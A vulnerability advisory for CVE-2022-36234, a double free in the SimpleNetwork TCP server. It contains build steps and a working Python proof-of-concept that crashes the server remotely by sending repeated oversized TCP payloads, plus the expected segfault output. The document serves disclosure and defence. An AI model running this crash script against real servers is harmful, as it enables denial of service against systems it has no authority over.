# Description of CVE-2022-36234

SimpleNetwork TCP Server commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 was discovered to contain a double free vulnerability which is exploited via crafted TCP packets. Triggering the double free will allow clients to crash any SimpleNetwork TCP server remotely. In other situations, double free vulnerabilities can cause undefined behavior and potentially code execution in the right circumstances.

# Reproduction

To ensure you have the standard build tools required to compile the library, install the following packages (on most systems this will already be installed):

```
sudo apt-get install build-essential git
```

The vulnerability can be reproduced by sending consecutive requests to the server containing a large buffer of characters in a TCP packet.  First, compile the 'libSimpleNetwork' library and example server provided in the source code:

```
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make
```

### Start the example-server:

```
./server 80 1
```

### Save the following python3 proof of concept script to a file (modify the host as needed):
```
import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")
```

### Execute the python3 script:

```
python3 poc.py
```

### Crash verification:
If successful, the server will crash and you will see the following output from the application:
```
segmentation fault  ./server 80 1
```


# References

* https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
* https://cwe.mitre.org/data/definitions/415.html
* https://github.com/kashimAstro/SimpleNetwork/issues/22
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234
